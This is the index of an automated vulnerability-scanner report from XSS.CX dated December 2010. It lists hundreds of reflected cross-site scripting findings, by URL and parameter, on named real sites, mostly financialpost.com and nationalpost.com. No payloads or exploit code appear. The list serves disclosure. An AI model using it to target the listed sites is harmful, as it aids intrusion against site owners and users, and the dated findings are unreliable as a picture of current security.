Cross Site Scripting, SQL Injection, HTTP Header Injection | Report for 12-18-2010

CloudScan Vulnerability Crawler Report for 12-18-2010

Report generated by XSS.CX at Sun Dec 19 07:08:47 CST 2010.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler | MSRC Reference | GOOG Reference | CVE-2010-3486 | CVE-2010-3425

Loading

1. Cross-site scripting (reflected)

1.1. http://digg.com/submit [REST URL parameter 1]

1.2. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/cj_K_lW0d4-YQ44GSY9bNGTqTq0kx1yD/view.html [[Place%20Your%20Cache%20Buster%20ID%20here]&ASTPCT parameter]

1.3. http://vancouverdisabilitiesday.ca/%20target= [name of an arbitrarily supplied request parameter]

1.4. http://ww3.nationalpost.com/services/email/share/ [callback parameter]

1.5. http://ww3.nationalpost.com/services/pluck/atc/ [returnurl parameter]

1.6. http://www.advisorworld.com/Compare-Annuity-Rates-2 [utm_source parameter]

1.7. http://www.ashoka.org/story/6495 [name of an arbitrarily supplied request parameter]

1.8. http://www.ashoka.org/story/6495 [name of an arbitrarily supplied request parameter]

1.9. http://www.canada.com/ [name of an arbitrarily supplied request parameter]

1.10. http://www.cheap-registrar.com/ [name of an arbitrarily supplied request parameter]

1.11. http://www.cheap-registrar.com/ [name of an arbitrarily supplied request parameter]

1.12. http://www.domaintools.com/products/history-block.html [REST URL parameter 2]

1.13. http://www.domaintools.com/products/reports/reverse-ip.html [REST URL parameter 3]

1.14. http://www.domaintools.com/products/units.html [REST URL parameter 2]

1.15. http://www.domaintools.com/reverse-ip/explorer.html [REST URL parameter 2]

1.16. http://www.financialpost.com/16994.rss [REST URL parameter 1]

1.17. http://www.financialpost.com/17052.rss [REST URL parameter 1]

1.18. http://www.financialpost.com/17082.rss [REST URL parameter 1]

1.19. http://www.financialpost.com/906070.rss [REST URL parameter 1]

1.20. http://www.financialpost.com/917156.rss [REST URL parameter 1]

1.21. http://www.financialpost.com/_assets/css/idc/idms_styles.css [REST URL parameter 1]

1.22. http://www.financialpost.com/_assets/css/idc/idms_styles.css [REST URL parameter 2]

1.23. http://www.financialpost.com/_assets/css/idc/idms_styles.css [REST URL parameter 3]

1.24. http://www.financialpost.com/_assets/css/idc/idms_styles.css [REST URL parameter 4]

1.25. http://www.financialpost.com/_assets/css/idc/watchlist.css [REST URL parameter 1]

1.26. http://www.financialpost.com/_assets/css/idc/watchlist.css [REST URL parameter 2]

1.27. http://www.financialpost.com/_assets/css/idc/watchlist.css [REST URL parameter 3]

1.28. http://www.financialpost.com/_assets/css/idc/watchlist.css [REST URL parameter 4]

1.29. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 1]

1.30. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 2]

1.31. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 3]

1.32. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 4]

1.33. http://www.financialpost.com/_assets/include/thirdparty/idc/ad-init.js [REST URL parameter 5]

1.34. http://www.financialpost.com/ajax/email/generic.xml [REST URL parameter 1]

1.35. http://www.financialpost.com/ajax/email/generic.xml [REST URL parameter 2]

1.36. http://www.financialpost.com/ajax/email/generic.xml [REST URL parameter 3]

1.37. http://www.financialpost.com/blogs/ [REST URL parameter 1]

1.38. http://www.financialpost.com/careers/ [REST URL parameter 1]

1.39. http://www.financialpost.com/careers/Passionate+about+inclusion/3908742/story.html [REST URL parameter 1]

1.40. http://www.financialpost.com/careers/Passionate+about+inclusion/3908742/story.html [REST URL parameter 3]

1.41. http://www.financialpost.com/careers/Passionate+about+inclusion/3908742/story.html [REST URL parameter 4]

1.42. http://www.financialpost.com/careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html [REST URL parameter 1]

1.43. http://www.financialpost.com/careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html [REST URL parameter 3]

1.44. http://www.financialpost.com/careers/Pink+collar+jobs+spare+women+from+recession/3951473/story.html [REST URL parameter 4]

1.45. http://www.financialpost.com/careers/Rules+keep+work+parties+festive/3978714/story.html [REST URL parameter 1]

1.46. http://www.financialpost.com/careers/Rules+keep+work+parties+festive/3978714/story.html [REST URL parameter 3]

1.47. http://www.financialpost.com/careers/Rules+keep+work+parties+festive/3978714/story.html [REST URL parameter 4]

1.48. http://www.financialpost.com/careers/Texting+lazy+IMHO/3941140/story.html [REST URL parameter 1]

1.49. http://www.financialpost.com/careers/Texting+lazy+IMHO/3941140/story.html [REST URL parameter 3]

1.50. http://www.financialpost.com/careers/Texting+lazy+IMHO/3941140/story.html [REST URL parameter 4]

1.51. http://www.financialpost.com/careers/writing+workers+with+children/3943108/story.html [REST URL parameter 1]

1.52. http://www.financialpost.com/careers/writing+workers+with+children/3943108/story.html [REST URL parameter 3]

1.53. http://www.financialpost.com/careers/writing+workers+with+children/3943108/story.html [REST URL parameter 4]

1.54. http://www.financialpost.com/css/print.css [REST URL parameter 1]

1.55. http://www.financialpost.com/css/print.css [REST URL parameter 2]

1.56. http://www.financialpost.com/css/story_widget.min.css [REST URL parameter 1]

1.57. http://www.financialpost.com/css/story_widget.min.css [REST URL parameter 2]

1.58. http://www.financialpost.com/entrepreneur/ [REST URL parameter 1]

1.59. http://www.financialpost.com/entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html [REST URL parameter 1]

1.60. http://www.financialpost.com/entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html [REST URL parameter 3]

1.61. http://www.financialpost.com/entrepreneur/Hidden+angels+Magnet+aspiring+startups/3967315/story.html [REST URL parameter 4]

1.62. http://www.financialpost.com/entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html [REST URL parameter 1]

1.63. http://www.financialpost.com/entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html [REST URL parameter 3]

1.64. http://www.financialpost.com/entrepreneur/Partners+leverage+gift+card+idea/3931988/story.html [REST URL parameter 4]

1.65. http://www.financialpost.com/entrepreneur/Social+media+gives+medium+life/3931982/story.html [REST URL parameter 1]

1.66. http://www.financialpost.com/entrepreneur/Social+media+gives+medium+life/3931982/story.html [REST URL parameter 3]

1.67. http://www.financialpost.com/entrepreneur/Social+media+gives+medium+life/3931982/story.html [REST URL parameter 4]

1.68. http://www.financialpost.com/entrepreneur/Strategy+comes+easy/3931965/story.html [REST URL parameter 1]

1.69. http://www.financialpost.com/entrepreneur/Strategy+comes+easy/3931965/story.html [REST URL parameter 3]

1.70. http://www.financialpost.com/entrepreneur/Strategy+comes+easy/3931965/story.html [REST URL parameter 4]

1.71. http://www.financialpost.com/entrepreneur/Virtual+training/3967328/story.html [REST URL parameter 1]

1.72. http://www.financialpost.com/entrepreneur/Virtual+training/3967328/story.html [REST URL parameter 3]

1.73. http://www.financialpost.com/entrepreneur/Virtual+training/3967328/story.html [REST URL parameter 4]

1.74. http://www.financialpost.com/entrepreneur/advice/ [REST URL parameter 1]

1.75. http://www.financialpost.com/entrepreneur/advice/ [REST URL parameter 2]

1.76. http://www.financialpost.com/entrepreneur/killer+apps/3967312/story.html [REST URL parameter 1]

1.77. http://www.financialpost.com/entrepreneur/killer+apps/3967312/story.html [REST URL parameter 3]

1.78. http://www.financialpost.com/entrepreneur/killer+apps/3967312/story.html [REST URL parameter 4]

1.79. http://www.financialpost.com/executive/ [REST URL parameter 1]

1.80. http://www.financialpost.com/executive/Departures+2010/3987965/story.html [REST URL parameter 1]

1.81. http://www.financialpost.com/executive/Departures+2010/3987965/story.html [REST URL parameter 3]

1.82. http://www.financialpost.com/executive/Departures+2010/3987965/story.html [REST URL parameter 4]

1.83. http://www.financialpost.com/executive/Discover+your+true+competitive+advantage/3992781/story.html [REST URL parameter 1]

1.84. http://www.financialpost.com/executive/Discover+your+true+competitive+advantage/3992781/story.html [REST URL parameter 3]

1.85. http://www.financialpost.com/executive/Discover+your+true+competitive+advantage/3992781/story.html [REST URL parameter 4]

1.86. http://www.financialpost.com/executive/Leadership+companies+honest+with+their+employees/3987151/story.html [REST URL parameter 1]

1.87. http://www.financialpost.com/executive/Leadership+companies+honest+with+their+employees/3987151/story.html [REST URL parameter 3]

1.88. http://www.financialpost.com/executive/Leadership+companies+honest+with+their+employees/3987151/story.html [REST URL parameter 4]

1.89. http://www.financialpost.com/executive/Leadership+make+good+decisions/3957410/story.html [REST URL parameter 1]

1.90. http://www.financialpost.com/executive/Leadership+make+good+decisions/3957410/story.html [REST URL parameter 3]

1.91. http://www.financialpost.com/executive/Leadership+make+good+decisions/3957410/story.html [REST URL parameter 4]

1.92. http://www.financialpost.com/executive/Organizations+fight+bureaucracy/3992875/story.html [REST URL parameter 1]

1.93. http://www.financialpost.com/executive/Organizations+fight+bureaucracy/3992875/story.html [REST URL parameter 3]

1.94. http://www.financialpost.com/executive/Organizations+fight+bureaucracy/3992875/story.html [REST URL parameter 4]

1.95. http://www.financialpost.com/executive/canadian-mba-programs/ [REST URL parameter 1]

1.96. http://www.financialpost.com/executive/canadian-mba-programs/ [REST URL parameter 2]

1.97. http://www.financialpost.com/executive/ceo/ [REST URL parameter 1]

1.98. http://www.financialpost.com/executive/ceo/ [REST URL parameter 2]

1.99. http://www.financialpost.com/executive/hr/ [REST URL parameter 1]

1.100. http://www.financialpost.com/executive/hr/ [REST URL parameter 2]

1.101. http://www.financialpost.com/executive/smart-shift/ [REST URL parameter 1]

1.102. http://www.financialpost.com/executive/smart-shift/ [REST URL parameter 2]

1.103. http://www.financialpost.com/executive/social+media+worth+investment/3972248/story.html [REST URL parameter 1]

1.104. http://www.financialpost.com/executive/social+media+worth+investment/3972248/story.html [REST URL parameter 3]

1.105. http://www.financialpost.com/executive/social+media+worth+investment/3972248/story.html [REST URL parameter 4]

1.106. http://www.financialpost.com/executive/women/ [REST URL parameter 1]

1.107. http://www.financialpost.com/executive/women/ [REST URL parameter 2]

1.108. http://www.financialpost.com/images/favicon.ico [REST URL parameter 1]

1.109. http://www.financialpost.com/images/favicon.ico [REST URL parameter 2]

1.110. http://www.financialpost.com/includes/header/ccn-login.html [REST URL parameter 1]

1.111. http://www.financialpost.com/includes/header/ccn-login.html [REST URL parameter 2]

1.112. http://www.financialpost.com/includes/header/ccn-login.html [REST URL parameter 3]

1.113. http://www.financialpost.com/includes/sidebar/most-popular/iframed.html [REST URL parameter 1]

1.114. http://www.financialpost.com/includes/sidebar/most-popular/iframed.html [REST URL parameter 2]

1.115. http://www.financialpost.com/includes/sidebar/most-popular/iframed.html [REST URL parameter 3]

1.116. http://www.financialpost.com/includes/sidebar/most-popular/iframed.html [REST URL parameter 4]

1.117. http://www.financialpost.com/js/account_s_code.js [REST URL parameter 1]

1.118. http://www.financialpost.com/js/account_s_code.js [REST URL parameter 2]

1.119. http://www.financialpost.com/js/local_s_code.js [REST URL parameter 1]

1.120. http://www.financialpost.com/js/local_s_code.js [REST URL parameter 2]

1.121. http://www.financialpost.com/magazine/ [REST URL parameter 1]

1.122. http://www.financialpost.com/markets/ [REST URL parameter 1]

1.123. http://www.financialpost.com/markets/company/index.html [REST URL parameter 1]

1.124. http://www.financialpost.com/markets/company/index.html [REST URL parameter 2]

1.125. http://www.financialpost.com/markets/company/index.html [REST URL parameter 3]

1.126. http://www.financialpost.com/markets/company/news/story.html [REST URL parameter 1]

1.127. http://www.financialpost.com/markets/company/news/story.html [REST URL parameter 2]

1.128. http://www.financialpost.com/markets/company/news/story.html [REST URL parameter 3]

1.129. http://www.financialpost.com/markets/company/news/story.html [REST URL parameter 4]

1.130. http://www.financialpost.com/markets/currencies/ [REST URL parameter 1]

1.131. http://www.financialpost.com/markets/currencies/ [REST URL parameter 2]

1.132. http://www.financialpost.com/markets/data/ [REST URL parameter 1]

1.133. http://www.financialpost.com/markets/data/ [REST URL parameter 2]

1.134. http://www.financialpost.com/markets/detail/index.html [REST URL parameter 1]

1.135. http://www.financialpost.com/markets/detail/index.html [REST URL parameter 2]

1.136. http://www.financialpost.com/markets/detail/index.html [REST URL parameter 3]

1.137. http://www.financialpost.com/markets/funds/ [REST URL parameter 1]

1.138. http://www.financialpost.com/markets/funds/ [REST URL parameter 2]

1.139. http://www.financialpost.com/markets/funds/profile/index.html [REST URL parameter 1]

1.140. http://www.financialpost.com/markets/funds/profile/index.html [REST URL parameter 2]

1.141. http://www.financialpost.com/markets/funds/profile/index.html [REST URL parameter 3]

1.142. http://www.financialpost.com/markets/funds/profile/index.html [REST URL parameter 4]

1.143. http://www.financialpost.com/markets/futures/ [REST URL parameter 1]

1.144. http://www.financialpost.com/markets/futures/ [REST URL parameter 2]

1.145. http://www.financialpost.com/markets/idms-terms.html [REST URL parameter 1]

1.146. http://www.financialpost.com/markets/idms-terms.html [REST URL parameter 2]

1.147. http://www.financialpost.com/markets/key-numbers/ [REST URL parameter 1]

1.148. http://www.financialpost.com/markets/key-numbers/ [REST URL parameter 2]

1.149. http://www.financialpost.com/markets/news-alerts/ [REST URL parameter 1]

1.150. http://www.financialpost.com/markets/news-alerts/ [REST URL parameter 2]

1.151. http://www.financialpost.com/markets/news/ [REST URL parameter 1]

1.152. http://www.financialpost.com/markets/news/ [REST URL parameter 2]

1.153. http://www.financialpost.com/markets/portfolio/ [REST URL parameter 1]

1.154. http://www.financialpost.com/markets/portfolio/ [REST URL parameter 2]

1.155. http://www.financialpost.com/markets/results/index.html [REST URL parameter 1]

1.156. http://www.financialpost.com/markets/results/index.html [REST URL parameter 2]

1.157. http://www.financialpost.com/markets/results/index.html [REST URL parameter 3]

1.158. http://www.financialpost.com/markets/watchlist/ [REST URL parameter 1]

1.159. http://www.financialpost.com/markets/watchlist/ [REST URL parameter 2]

1.160. http://www.financialpost.com/markets/watchlist/index.html [REST URL parameter 1]

1.161. http://www.financialpost.com/markets/watchlist/index.html [REST URL parameter 2]

1.162. http://www.financialpost.com/markets/watchlist/index.html [REST URL parameter 3]

1.163. http://www.financialpost.com/most-popular/ [REST URL parameter 1]

1.164. http://www.financialpost.com/news/ [REST URL parameter 1]

1.165. http://www.financialpost.com/news/FP500/ [REST URL parameter 1]

1.166. http://www.financialpost.com/news/FP500/ [REST URL parameter 2]

1.167. http://www.financialpost.com/news/business-insider/ [REST URL parameter 1]

1.168. http://www.financialpost.com/news/business-insider/ [REST URL parameter 2]

1.169. http://www.financialpost.com/news/business-insider/ways+nail+first+impression/3987967/story.html [REST URL parameter 1]

1.170. http://www.financialpost.com/news/business-insider/ways+nail+first+impression/3987967/story.html [REST URL parameter 2]

1.171. http://www.financialpost.com/news/business-insider/ways+nail+first+impression/3987967/story.html [REST URL parameter 4]

1.172. http://www.financialpost.com/news/business-insider/ways+nail+first+impression/3987967/story.html [REST URL parameter 5]

1.173. http://www.financialpost.com/news/economy/ [REST URL parameter 1]

1.174. http://www.financialpost.com/news/economy/ [REST URL parameter 2]

1.175. http://www.financialpost.com/news/economy/Europe+North+America/3996015/story.html [REST URL parameter 1]

1.176. http://www.financialpost.com/news/economy/Europe+North+America/3996015/story.html [REST URL parameter 2]

1.177. http://www.financialpost.com/news/economy/Europe+North+America/3996015/story.html [REST URL parameter 4]

1.178. http://www.financialpost.com/news/economy/Europe+North+America/3996015/story.html [REST URL parameter 5]

1.179. http://www.financialpost.com/news/energy/ [REST URL parameter 1]

1.180. http://www.financialpost.com/news/energy/ [REST URL parameter 2]

1.181. http://www.financialpost.com/news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html [REST URL parameter 1]

1.182. http://www.financialpost.com/news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html [REST URL parameter 2]

1.183. http://www.financialpost.com/news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html [REST URL parameter 4]

1.184. http://www.financialpost.com/news/energy/Suncor+deal+with+Total+directional+shift+says/3995942/story.html [REST URL parameter 5]

1.185. http://www.financialpost.com/news/financials/ [REST URL parameter 1]

1.186. http://www.financialpost.com/news/financials/ [REST URL parameter 2]

1.187. http://www.financialpost.com/news/financials/steps+plate/3996039/story.html [REST URL parameter 1]

1.188. http://www.financialpost.com/news/financials/steps+plate/3996039/story.html [REST URL parameter 2]

1.189. http://www.financialpost.com/news/financials/steps+plate/3996039/story.html [REST URL parameter 4]

1.190. http://www.financialpost.com/news/financials/steps+plate/3996039/story.html [REST URL parameter 5]

1.191. http://www.financialpost.com/news/legal/ [REST URL parameter 1]

1.192. http://www.financialpost.com/news/legal/ [REST URL parameter 2]

1.193. http://www.financialpost.com/news/marketing/ [REST URL parameter 1]

1.194. http://www.financialpost.com/news/marketing/ [REST URL parameter 2]

1.195. http://www.financialpost.com/news/mining/ [REST URL parameter 1]

1.196. http://www.financialpost.com/news/mining/ [REST URL parameter 2]

1.197. http://www.financialpost.com/news/technology/ [REST URL parameter 1]

1.198. http://www.financialpost.com/news/technology/ [REST URL parameter 2]

1.199. http://www.financialpost.com/opinion/ [REST URL parameter 1]

1.200. http://www.financialpost.com/opinion/breaking-views/ [REST URL parameter 1]

1.201. http://www.financialpost.com/opinion/breaking-views/ [REST URL parameter 2]

1.202. http://www.financialpost.com/opinion/columnists/ [REST URL parameter 1]

1.203. http://www.financialpost.com/opinion/columnists/ [REST URL parameter 2]

1.204. http://www.financialpost.com/opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html [REST URL parameter 1]

1.205. http://www.financialpost.com/opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html [REST URL parameter 2]

1.206. http://www.financialpost.com/opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html [REST URL parameter 4]

1.207. http://www.financialpost.com/opinion/columnists/Diabetes+RDSP+confusion/3996673/story.html [REST URL parameter 5]

1.208. http://www.financialpost.com/opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html [REST URL parameter 1]

1.209. http://www.financialpost.com/opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html [REST URL parameter 2]

1.210. http://www.financialpost.com/opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html [REST URL parameter 4]

1.211. http://www.financialpost.com/opinion/columnists/Gordon+Brown+fairy+tale/3996686/story.html [REST URL parameter 5]

1.212. http://www.financialpost.com/opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html [REST URL parameter 1]

1.213. http://www.financialpost.com/opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html [REST URL parameter 2]

1.214. http://www.financialpost.com/opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html [REST URL parameter 4]

1.215. http://www.financialpost.com/opinion/columnists/Hoping+Santa+puts+inflation+stocking/3996670/story.html [REST URL parameter 5]

1.216. http://www.financialpost.com/opinion/columnists/Retired+forgotten/3996666/story.html [REST URL parameter 1]

1.217. http://www.financialpost.com/opinion/columnists/Retired+forgotten/3996666/story.html [REST URL parameter 2]

1.218. http://www.financialpost.com/opinion/columnists/Retired+forgotten/3996666/story.html [REST URL parameter 4]

1.219. http://www.financialpost.com/opinion/columnists/Retired+forgotten/3996666/story.html [REST URL parameter 5]

1.220. http://www.financialpost.com/opinion/columnists/barry-critchley.html [REST URL parameter 1]

1.221. http://www.financialpost.com/opinion/columnists/barry-critchley.html [REST URL parameter 2]

1.222. http://www.financialpost.com/opinion/columnists/barry-critchley.html [REST URL parameter 3]

1.223. http://www.financialpost.com/opinion/columnists/diane-francis.html [REST URL parameter 1]

1.224. http://www.financialpost.com/opinion/columnists/diane-francis.html [REST URL parameter 2]

1.225. http://www.financialpost.com/opinion/columnists/diane-francis.html [REST URL parameter 3]

1.226. http://www.financialpost.com/opinion/columnists/garry-marr.html [REST URL parameter 1]

1.227. http://www.financialpost.com/opinion/columnists/garry-marr.html [REST URL parameter 2]

1.228. http://www.financialpost.com/opinion/columnists/garry-marr.html [REST URL parameter 3]

1.229. http://www.financialpost.com/opinion/columnists/jamie-golombek.html [REST URL parameter 1]

1.230. http://www.financialpost.com/opinion/columnists/jamie-golombek.html [REST URL parameter 2]

1.231. http://www.financialpost.com/opinion/columnists/jamie-golombek.html [REST URL parameter 3]

1.232. http://www.financialpost.com/opinion/columnists/jonathan-chevreau.html [REST URL parameter 1]

1.233. http://www.financialpost.com/opinion/columnists/jonathan-chevreau.html [REST URL parameter 2]

1.234. http://www.financialpost.com/opinion/columnists/jonathan-chevreau.html [REST URL parameter 3]

1.235. http://www.financialpost.com/opinion/columnists/peter-foster.html [REST URL parameter 1]

1.236. http://www.financialpost.com/opinion/columnists/peter-foster.html [REST URL parameter 2]

1.237. http://www.financialpost.com/opinion/columnists/peter-foster.html [REST URL parameter 3]

1.238. http://www.financialpost.com/opinion/columnists/terence-corcoran.html [REST URL parameter 1]

1.239. http://www.financialpost.com/opinion/columnists/terence-corcoran.html [REST URL parameter 2]

1.240. http://www.financialpost.com/opinion/columnists/terence-corcoran.html [REST URL parameter 3]

1.241. http://www.financialpost.com/opinion/columnists/william-hanley.html [REST URL parameter 1]

1.242. http://www.financialpost.com/opinion/columnists/william-hanley.html [REST URL parameter 2]

1.243. http://www.financialpost.com/opinion/columnists/william-hanley.html [REST URL parameter 3]

1.244. http://www.financialpost.com/personal-finance/ [REST URL parameter 1]

1.245. http://www.financialpost.com/personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html [REST URL parameter 1]

1.246. http://www.financialpost.com/personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html [REST URL parameter 3]

1.247. http://www.financialpost.com/personal-finance/Christmas+hardest+time+sell+best+time/3995600/story.html [REST URL parameter 4]

1.248. http://www.financialpost.com/personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html [REST URL parameter 1]

1.249. http://www.financialpost.com/personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html [REST URL parameter 3]

1.250. http://www.financialpost.com/personal-finance/Does+diabetes+qualify+disability+credit/3994512/story.html [REST URL parameter 4]

1.251. http://www.financialpost.com/personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html [REST URL parameter 1]

1.252. http://www.financialpost.com/personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html [REST URL parameter 3]

1.253. http://www.financialpost.com/personal-finance/Elderly+brain+makes+riskier+investments/3983726/story.html [REST URL parameter 4]

1.254. http://www.financialpost.com/personal-finance/Retired+forgotten/3953088/story.html [REST URL parameter 1]

1.255. http://www.financialpost.com/personal-finance/Retired+forgotten/3953088/story.html [REST URL parameter 3]

1.256. http://www.financialpost.com/personal-finance/Retired+forgotten/3953088/story.html [REST URL parameter 4]

1.257. http://www.financialpost.com/personal-finance/Warning+Asset+bubbles+underway/3976343/story.html [REST URL parameter 1]

1.258. http://www.financialpost.com/personal-finance/Warning+Asset+bubbles+underway/3976343/story.html [REST URL parameter 3]

1.259. http://www.financialpost.com/personal-finance/Warning+Asset+bubbles+underway/3976343/story.html [REST URL parameter 4]

1.260. http://www.financialpost.com/personal-finance/Where+retire+Florida+most+popular+state/3994547/story.html [REST URL parameter 1]

1.261. http://www.financialpost.com/personal-finance/Where+retire+Florida+most+popular+state/3994547/story.html [REST URL parameter 3]

1.262. http://www.financialpost.com/personal-finance/Where+retire+Florida+most+popular+state/3994547/story.html [REST URL parameter 4]

1.263. http://www.financialpost.com/personal-finance/family/ [REST URL parameter 1]

1.264. http://www.financialpost.com/personal-finance/family/ [REST URL parameter 2]

1.265. http://www.financialpost.com/personal-finance/family/Landlord+held+hostage+real+estate+investments/3988718/story.html [REST URL parameter 1]

1.266. http://www.financialpost.com/personal-finance/family/Landlord+held+hostage+real+estate+investments/3988718/story.html [REST URL parameter 2]

1.267. http://www.financialpost.com/personal-finance/family/Landlord+held+hostage+real+estate+investments/3988718/story.html [REST URL parameter 4]

1.268. http://www.financialpost.com/personal-finance/family/Landlord+held+hostage+real+estate+investments/3988718/story.html [REST URL parameter 5]

1.269. http://www.financialpost.com/personal-finance/mortgages/ [REST URL parameter 1]

1.270. http://www.financialpost.com/personal-finance/mortgages/ [REST URL parameter 2]

1.271. http://www.financialpost.com/personal-finance/rrsp/ [REST URL parameter 1]

1.272. http://www.financialpost.com/personal-finance/rrsp/ [REST URL parameter 2]

1.273. http://www.financialpost.com/personal-finance/taxes/ [REST URL parameter 1]

1.274. http://www.financialpost.com/personal-finance/taxes/ [REST URL parameter 2]

1.275. http://www.financialpost.com/personal-finance/tfsa/ [REST URL parameter 1]

1.276. http://www.financialpost.com/personal-finance/tfsa/ [REST URL parameter 2]

1.277. http://www.financialpost.com/personal-finance/wealthy-boomer/ [REST URL parameter 1]

1.278. http://www.financialpost.com/personal-finance/wealthy-boomer/ [REST URL parameter 2]

1.279. http://www.financialpost.com/personal-finance/your-money/ [REST URL parameter 1]

1.280. http://www.financialpost.com/personal-finance/your-money/ [REST URL parameter 2]

1.281. http://www.financialpost.com/podcasts/ [REST URL parameter 1]

1.282. http://www.financialpost.com/related/topics/index.html [REST URL parameter 1]

1.283. http://www.financialpost.com/related/topics/index.html [REST URL parameter 2]

1.284. http://www.financialpost.com/related/topics/index.html [REST URL parameter 3]

1.285. http://www.financialpost.com/related/topics/index.html [subject parameter]

1.286. http://www.financialpost.com/related/topics/index.html [type parameter]

1.287. http://www.financialpost.com/scripts/include.aspx [REST URL parameter 1]

1.288. http://www.financialpost.com/scripts/include.aspx [REST URL parameter 2]

1.289. http://www.financialpost.com/sitemap/ [REST URL parameter 1]

1.290. http://www.financialpost.com/small-business/best-cities/joint-venture/Closing+between+research+experience/2102841/story.html [REST URL parameter 1]

1.291. http://www.financialpost.com/small-business/best-cities/joint-venture/Closing+between+research+experience/2102841/story.html [REST URL parameter 2]

1.292. http://www.financialpost.com/small-business/best-cities/joint-venture/Closing+between+research+experience/2102841/story.html [REST URL parameter 3]

1.293. http://www.financialpost.com/small-business/best-cities/joint-venture/Closing+between+research+experience/2102841/story.html [REST URL parameter 5]

1.294. http://www.financialpost.com/small-business/best-cities/joint-venture/Closing+between+research+experience/2102841/story.html [REST URL parameter 6]

1.295. http://www.financialpost.com/small-business/best-cities/joint-venture/Partnerships+bright+spot+Britec/2055099/story.html [REST URL parameter 1]

1.296. http://www.financialpost.com/small-business/best-cities/joint-venture/Partnerships+bright+spot+Britec/2055099/story.html [REST URL parameter 2]

1.297. http://www.financialpost.com/small-business/best-cities/joint-venture/Partnerships+bright+spot+Britec/2055099/story.html [REST URL parameter 3]

1.298. http://www.financialpost.com/small-business/best-cities/joint-venture/Partnerships+bright+spot+Britec/2055099/story.html [REST URL parameter 5]

1.299. http://www.financialpost.com/small-business/best-cities/joint-venture/Partnerships+bright+spot+Britec/2055099/story.html [REST URL parameter 6]

1.300. http://www.financialpost.com/small-business/best-cities/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724/story.html [REST URL parameter 1]

1.301. http://www.financialpost.com/small-business/best-cities/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724/story.html [REST URL parameter 2]

1.302. http://www.financialpost.com/small-business/best-cities/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724/story.html [REST URL parameter 3]

1.303. http://www.financialpost.com/small-business/best-cities/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724/story.html [REST URL parameter 5]

1.304. http://www.financialpost.com/small-business/best-cities/joint-venture/Technology+gives+outdoor+adventure+company+edge/2132724/story.html [REST URL parameter 6]

1.305. http://www.financialpost.com/small-business/best-cities/joint-venture/story.html [REST URL parameter 1]

1.306. http://www.financialpost.com/small-business/best-cities/joint-venture/story.html [REST URL parameter 2]

1.307. http://www.financialpost.com/small-business/best-cities/joint-venture/story.html [REST URL parameter 3]

1.308. http://www.financialpost.com/small-business/best-cities/joint-venture/story.html [REST URL parameter 4]

1.309. http://www.financialpost.com/video/index.html [REST URL parameter 1]

1.310. http://www.financialpost.com/video/index.html [REST URL parameter 2]

1.311. http://www.foodnetwork.ca/guides/holidays/ [REST URL parameter 1]

1.312. http://www.foodnetwork.ca/guides/holidays/ [REST URL parameter 2]

1.313. http://www.manta.com/c/mtxl353/pla [name of an arbitrarily supplied request parameter]

1.314. http://www.nationalpost.com/_assets/images/arrow-sort-down.gif [REST URL parameter 1]

1.315. http://www.nationalpost.com/_assets/images/arrow-sort-down.gif [REST URL parameter 2]

1.316. http://www.nationalpost.com/_assets/images/arrow-sort-up.gif [REST URL parameter 1]

1.317. http://www.nationalpost.com/_assets/images/arrow-sort-up.gif [REST URL parameter 2]

1.318. http://www.nationalpost.com/case+million+Canadians/3938655/story.html [REST URL parameter 2]

1.319. http://www.nationalpost.com/css/main.min.css [REST URL parameter 1]

1.320. http://www.nationalpost.com/homes/Helen+Morris+Illegal+renos+such+drag/3994453/story.html [REST URL parameter 1]

1.321. http://www.nationalpost.com/homes/Helen+Morris+Illegal+renos+such+drag/3994453/story.html [REST URL parameter 3]

1.322. http://www.nationalpost.com/js/IDMSquote.min.js [REST URL parameter 1]

1.323. http://www.nationalpost.com/js/NPLib.min.js [REST URL parameter 1]

1.324. http://www.nationalpost.com/js/jquery.lazyload.mini.js [REST URL parameter 1]

1.325. http://www.nationalpost.com/related/topics/story.html [REST URL parameter 1]

1.326. http://www.nationalpost.com/related/topics/story.html [REST URL parameter 2]

1.327. http://www.nationalpost.com/rss/feed.xml [REST URL parameter 1]

1.328. http://www.nationalpost.com/search/index.html [REST URL parameter 1]

1.329. http://www.nationalpost.com/weather/index.html [REST URL parameter 1]

1.330. http://www.newswire.ca/en/releases/archive/January2010/25/c3763.html [name of an arbitrarily supplied request parameter]

1.331. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.332. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

1.333. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]

